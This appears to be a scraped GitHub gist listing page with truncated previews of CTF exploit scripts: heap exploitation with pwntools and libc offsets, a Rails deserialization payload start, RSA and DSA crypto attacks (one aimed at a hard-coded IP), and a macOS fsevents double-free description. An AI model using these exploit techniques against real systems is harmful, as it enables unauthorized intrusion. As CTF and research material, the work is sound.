View gist:b5280bc856bfc94157b760eb962e7b60
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
import re | |
import sys | |
import string | |
import itertools | |
# UAF in IndexCursor |
View railspwn.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'yaml' | |
require 'base64' | |
require 'erb' | |
class ActiveSupport | |
class Deprecation | |
def initialize() | |
@silenced = true | |
end | |
class DeprecatedInstanceVariableProxy |
View gracias.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sage.all import continued_fraction, Integer, inverse_mod | |
pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
View handicraft.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sage.all import * | |
import base64 | |
def factor(n,b): | |
M=1 | |
print 'start' | |
a = 2 | |
i=0 | |
for q in primes(b): | |
i+=1 |
View gracias.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sage.all import continued_fraction, Integer, inverse_mod | |
pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
View ctfzone_pwn.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# First stage: unsafe unlink | |
# Second stage (via a tunnel through a ROP chain): fastbin free pointer corruption | |
from pwn import * | |
import struct | |
import sys | |
offset_close = 0x00000000000f78b0 | |
offset_env = 0x3c6f38 |
View sigserver.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Implementation based on attack from | |
# http://www.hpl.hp.com/techreports/1999/HPL-1999-90.pdf | |
import socket | |
import telnetlib | |
import random | |
from hashlib import sha1 | |
from sage.all import inverse_mod, matrix, vector | |
TARGET = ('185.143.173.36', 1337) | |
sock=socket.create_connection(TARGET) |
View gist:416b333cb973812b39c085a42f5c19c4
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
The `FSEVENTS_DEVICE_FILTER_64` command for the fsevents device's `ioctl` method has a race condition bug which can lead to double `free` when the user decides to update the number of devices to 0. | |
static int | |
fseventsf_ioctl(struct fileproc *fp, u_long cmd, caddr_t data, vfs_context_t ctx) | |
{ | |
fsevent_handle *fseh = (struct fsevent_handle *)fp->f_fglob->fg_data; | |
int ret = 0; | |
fsevent_dev_filter_args64 *devfilt_args, _devfilt_args; | |
OSAddAtomic(1, &fseh->active); |
View robot_pwnage.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
# https://github.com/niklasb/ctf-tools/blob/master/pwnlib/tools.py | |
from pwnlib.tools import * | |
TARGET=('localhost',5000) | |
INTERVAL=0 | |
offset_free = 549184 | |
offset_system = 0x456d0 |
View baby.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import telnetlib | |
import time | |
import struct | |
import sys | |
TARGET=('localhost', 1337) | |
offset___libc_start_main_ret = 0x203f1 | |
offset_system = 0x00000000000456d0 |
NewerOlder